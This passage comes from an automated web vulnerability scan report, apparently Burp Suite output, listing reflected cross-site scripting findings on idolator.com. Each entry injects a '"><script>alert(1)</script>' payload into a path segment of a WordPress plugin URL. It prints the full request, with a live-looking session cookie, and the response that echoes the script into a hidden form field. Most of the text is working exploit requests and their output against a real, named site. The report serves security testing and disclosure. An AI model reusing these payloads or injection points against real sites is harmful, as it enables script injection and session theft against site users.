Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:01 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented291\"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.141. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9660a"><script>alert(1)</script>6dd36c39f9b was submitted in the REST URL parameter 2. This input was echoed as 9660a\"><script>alert(1)</script>6dd36c39f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9660a"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins9660a\"><script>alert(1)</script>6dd36c39f9b/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.142. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c210"><script>alert(1)</script>a81def3ac26 was submitted in the REST URL parameter 3. This input was echoed as 3c210\"><script>alert(1)</script>a81def3ac26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:25 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets3c210\"><script>alert(1)</script>a81def3ac26/js/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.143. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92dfd"><script>alert(1)</script>5ce5a42979 was submitted in the REST URL parameter 4. This input was echoed as 92dfd\"><script>alert(1)</script>5ce5a42979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:38 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36041
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js92dfd\"><script>alert(1)</script>5ce5a42979/jcarousellite_1.0.1.min.js?ver=2.8.6" />
...[SNIP]...

4.144. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fef5"><script>alert(1)</script>bb99263f410 was submitted in the REST URL parameter 5. This input was echoed as 9fef5\"><script>alert(1)</script>bb99263f410 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5"><script>alert(1)</script>bb99263f410?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:50 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js9fef5\"><script>alert(1)</script>bb99263f410?ver=2.8.6" />
...[SNIP]...

4.145. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13af3"><script>alert(1)</script>cc47ae3484e was submitted in the REST URL parameter 1. This input was echoed as 13af3\"><script>alert(1)</script>cc47ae3484e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content13af3"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content13af3\"><script>alert(1)</script>cc47ae3484e/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.146. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389d7"><script>alert(1)</script>6059268cfdb was submitted in the REST URL parameter 2. This input was echoed as 389d7\"><script>alert(1)</script>6059268cfdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins389d7"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins389d7\"><script>alert(1)</script>6059268cfdb/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.147. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d47"><script>alert(1)</script>9b30164d27d was submitted in the REST URL parameter 3. This input was echoed as d1d47\"><script>alert(1)</script>9b30164d27d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:29 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgetsd1d47\"><script>alert(1)</script>9b30164d27d/js/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.148. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bea"><script>alert(1)</script>d444ad713dd was submitted in the REST URL parameter 4. This input was echoed as 50bea\"><script>alert(1)</script>d444ad713dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:42 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js50bea\"><script>alert(1)</script>d444ad713dd/jquery.mousewheel.min.js?ver=2.8.6" />
...[SNIP]...

4.149. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926b2"><script>alert(1)</script>9cac7e6f268 was submitted in the REST URL parameter 5. This input was echoed as 926b2\"><script>alert(1)</script>9cac7e6f268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2"><script>alert(1)</script>9cac7e6f268?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:54 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36038
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jquery.mousewheel.min.js926b2\"><script>alert(1)</script>9cac7e6f268?ver=2.8.6" />
...[SNIP]...

4.150. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd33c"><script>alert(1)</script>f640e7cc530 was submitted in the REST URL parameter 1. This input was echoed as cd33c\"><script>alert(1)</script>f640e7cc530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentcd33c"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentcd33c\"><script>alert(1)</script>f640e7cc530/plugins/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.151. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf26"><script>alert(1)</script>ddacd7a0384 was submitted in the REST URL parameter 2. This input was echoed as 6cf26\"><script>alert(1)</script>ddacd7a0384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins6cf26"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins6cf26\"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.152. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22af8"><script>alert(1)</script>b845d5fbef6 was submitted in the REST URL parameter 3. This input was echoed as 22af8\"><script>alert(1)</script>b845d5fbef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

